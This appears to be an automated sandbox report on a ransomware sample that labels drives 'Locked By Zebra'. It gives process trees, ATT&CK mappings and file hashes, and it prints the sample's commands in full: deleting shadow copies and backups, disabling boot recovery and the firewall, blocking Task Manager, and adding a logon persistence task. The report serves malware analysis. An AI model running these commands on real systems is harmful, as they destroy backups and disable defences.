PID 4832 wrote to memory of 1792	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 1792	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 1792 wrote to memory of 4652	1792	cmd.exe	vssadmin.exe
PID 1792 wrote to memory of 4652	1792	cmd.exe	vssadmin.exe
PID 4832 wrote to memory of 1624	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 1624	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 1624 wrote to memory of 2128	1624	cmd.exe	wbadmin.exe
PID 1624 wrote to memory of 2128	1624	cmd.exe	wbadmin.exe
PID 4832 wrote to memory of 2524	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 2524	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 2524 wrote to memory of 3164	2524	cmd.exe	WMIC.exe
PID 2524 wrote to memory of 3164	2524	cmd.exe	WMIC.exe
PID 4832 wrote to memory of 3328	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 3328	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 3328 wrote to memory of 3308	3328	cmd.exe	wbadmin.exe
PID 3328 wrote to memory of 3308	3328	cmd.exe	wbadmin.exe
PID 4832 wrote to memory of 1728	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 1728	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 3008	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 3008	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 3008 wrote to memory of 3916	3008	cmd.exe	bcdedit.exe
PID 3008 wrote to memory of 3916	3008	cmd.exe	bcdedit.exe
PID 4832 wrote to memory of 1224	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 1224	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 1224 wrote to memory of 2224	1224	cmd.exe	netsh.exe
PID 1224 wrote to memory of 2224	1224	cmd.exe	netsh.exe
PID 4832 wrote to memory of 3904	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 3904	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 3904 wrote to memory of 1236	3904	cmd.exe	netsh.exe
PID 3904 wrote to memory of 1236	3904	cmd.exe	netsh.exe
PID 4832 wrote to memory of 2884	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 2884	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 2884 wrote to memory of 2248	2884	cmd.exe	reg.exe
PID 2884 wrote to memory of 2248	2884	cmd.exe	reg.exe
PID 4832 wrote to memory of 1560	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 1560	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 1560 wrote to memory of 3252	1560	cmd.exe	WMIC.exe
PID 1560 wrote to memory of 3252	1560	cmd.exe	WMIC.exe
PID 4832 wrote to memory of 4372	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 4372	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4372 wrote to memory of 2868	4372	cmd.exe	label.exe
PID 4372 wrote to memory of 2868	4372	cmd.exe	label.exe
PID 4832 wrote to memory of 1724	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 1724	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 1724 wrote to memory of 4448	1724	cmd.exe	label.exe
PID 1724 wrote to memory of 4448	1724	cmd.exe	label.exe
PID 4832 wrote to memory of 4400	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 4400	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4400 wrote to memory of 116	4400	cmd.exe	label.exe
PID 4400 wrote to memory of 116	4400	cmd.exe	label.exe
PID 4832 wrote to memory of 1016	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 1016	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 1016 wrote to memory of 3920	1016	cmd.exe	label.exe
PID 1016 wrote to memory of 3920	1016	cmd.exe	label.exe
PID 4832 wrote to memory of 416	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 416	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 416 wrote to memory of 2300	416	cmd.exe	label.exe
PID 416 wrote to memory of 2300	416	cmd.exe	label.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

332 attrib.exe

pid	process
332	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
"C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe"
3⤵
- Views/modifies file attributes
PID:332

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "ZEBRA" /tr "C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe"
2⤵
- Creates scheduled task(s)
PID:1568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
2⤵
- Suspicious use of WriteProcessMemory
PID:1792

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:4652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
2⤵
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:2128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
2⤵
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
2⤵
- Suspicious use of WriteProcessMemory
PID:3328

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
3⤵
- Deletes backup catalog
PID:3308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
2⤵
PID:1728

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
3⤵
- Modifies boot configuration data using bcdedit
PID:4168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
2⤵
- Suspicious use of WriteProcessMemory
PID:3008

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
3⤵
- Modifies boot configuration data using bcdedit
PID:3916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
2⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
- Modifies Windows Firewall
PID:2224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
2⤵
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=disable
3⤵
- Modifies Windows Firewall
PID:1236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2884

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:2248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wmic SHADOWCOPY /nointeractive
2⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\System32\Wbem\WMIC.exe
wmic SHADOWCOPY /nointeractive
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label A: Locked By Zebra
2⤵
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\system32\label.exe
label A: Locked By Zebra
3⤵
- Enumerates connected drives
PID:2868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label B: Locked By Zebra
2⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\system32\label.exe
label B: Locked By Zebra
3⤵
- Enumerates connected drives
PID:4448

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label C: Locked By Zebra
2⤵
- Suspicious use of WriteProcessMemory
PID:4400

C:\Windows\system32\label.exe
label C: Locked By Zebra
3⤵
PID:116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label D: Locked By Zebra
2⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\system32\label.exe
label D: Locked By Zebra
3⤵
- Enumerates connected drives
PID:3920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label E: Locked By Zebra
2⤵
- Suspicious use of WriteProcessMemory
PID:416

C:\Windows\system32\label.exe
label E: Locked By Zebra
3⤵
- Enumerates connected drives
PID:2300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label F: Locked By Zebra
2⤵
PID:276

C:\Windows\system32\label.exe
label F: Locked By Zebra
3⤵
- Enumerates connected drives
PID:2320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label G: Locked By Zebra
2⤵
PID:2596

C:\Windows\system32\label.exe
label G: Locked By Zebra
3⤵
- Enumerates connected drives
PID:3080

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label H: Locked By Zebra
2⤵
PID:3864

C:\Windows\system32\label.exe
label H: Locked By Zebra
3⤵
- Enumerates connected drives
PID:4168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label I: Locked By Zebra
2⤵
PID:3912

C:\Windows\system32\label.exe
label I: Locked By Zebra
3⤵
- Enumerates connected drives
PID:3868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label J: Locked By Zebra
2⤵
PID:2268

C:\Windows\system32\label.exe
label J: Locked By Zebra
3⤵
- Enumerates connected drives
PID:3872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label K: Locked By Zebra
2⤵
PID:3508

C:\Windows\system32\label.exe
label K: Locked By Zebra
3⤵
- Enumerates connected drives
PID:2360

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label L: Locked By Zebra
2⤵
PID:2484

C:\Windows\system32\label.exe
label L: Locked By Zebra
3⤵
- Enumerates connected drives
PID:3252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label M: Locked By Zebra
2⤵
PID:3080

C:\Windows\system32\label.exe
label M: Locked By Zebra
3⤵
- Enumerates connected drives
PID:3400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label N: Locked By Zebra
2⤵
PID:644

C:\Windows\system32\label.exe
label N: Locked By Zebra
3⤵
- Enumerates connected drives
PID:4448

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label O: Locked By Zebra
2⤵
PID:1408

C:\Windows\system32\label.exe
label O: Locked By Zebra
3⤵
- Enumerates connected drives
PID:1040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label P: Locked By Zebra
2⤵
PID:2012

C:\Windows\system32\label.exe
label P: Locked By Zebra
3⤵
- Enumerates connected drives
PID:2360

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label Q: Locked By Zebra
2⤵
PID:1144

C:\Windows\system32\label.exe
label Q: Locked By Zebra
3⤵
- Enumerates connected drives
PID:4932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label R: Locked By Zebra
2⤵
PID:4604

C:\Windows\system32\label.exe
label R: Locked By Zebra
3⤵
- Enumerates connected drives
PID:292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label S: Locked By Zebra
2⤵
PID:2868

C:\Windows\system32\label.exe
label S: Locked By Zebra
3⤵
- Enumerates connected drives
PID:3400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label T: Locked By Zebra
2⤵
PID:4376

C:\Windows\system32\label.exe
label T: Locked By Zebra
3⤵
- Enumerates connected drives
PID:4180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label U: Locked By Zebra
2⤵
PID:3872

C:\Windows\system32\label.exe
label U: Locked By Zebra
3⤵
- Enumerates connected drives
PID:880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label V: Locked By Zebra
2⤵
PID:4564

C:\Windows\system32\label.exe
label V: Locked By Zebra
3⤵
- Enumerates connected drives
PID:3100

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label W: Locked By Zebra
2⤵
PID:3308

C:\Windows\system32\label.exe
label W: Locked By Zebra
3⤵
- Enumerates connected drives
PID:1664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label X: Locked By Zebra
2⤵
PID:1936

C:\Windows\system32\label.exe
label X: Locked By Zebra
3⤵
- Enumerates connected drives
PID:3792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label Y: Locked By Zebra
2⤵
PID:4200

C:\Windows\system32\label.exe
label Y: Locked By Zebra
3⤵
- Enumerates connected drives
PID:4448

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C label Z: Locked By Zebra
2⤵
PID:1140

C:\Windows\system32\label.exe
label Z: Locked By Zebra
3⤵
- Enumerates connected drives
PID:436

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\!HELP FILES ENCRYPTED!.txt
2⤵
PID:4932

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3284

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:644

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:1108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3820 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
1⤵
PID:1716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-3808065738-1666277613-1125846146-1000\desktop.ini
Filesize
463B

MD5
038c9bfbb5b3a66571fae131a30ecef5

SHA1
61ec5384ce33224eda0782b82cf4203d03c0a8c2

SHA256
7b7f52d26a3f05c73e5a4edd57d33dc9af8ff89133feb7f499f9ab1bdd2b123c

SHA512
37785e470741a135b719c9e2f75c71683198943b9ee3224f44cb9e1fcf01760b491feba570cafb0c1cf6b08fa816a5d15222d2677e0784c09f08d74cd685ed9e

Download Submit
F:\$RECYCLE.BIN\!HELP FILES ENCRYPTED!.txt
Filesize
922B

MD5
edaa0b91f5b297c18f57330f8b857177

SHA1
3f65ce2eddd91bfa8069be815ae39570999114e4

SHA256
a05357637ea73d949e05ff78f7843f7186ed15688993363481d3f17d90953863

SHA512
1d120e810c2df8c5bd880f05f5bd1b1ddf6ee9c6039cdd22044aefbcb1904179fab8704811a02afdcc4d5325d572c67dd81caf0ffcb2f78ea70653eb8568f3c1

Download Submit
memory/4832-0-0x00000000002C0000-0x00000000003BC000-memory.dmp

Filesize
1008KB

Download
memory/4832-1-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/4832-2-0x000000001B390000-0x000000001B3A0000-memory.dmp

Filesize
64KB

Download
memory/4832-5-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/4832-6-0x000000001B390000-0x000000001B3A0000-memory.dmp

Filesize
64KB

Download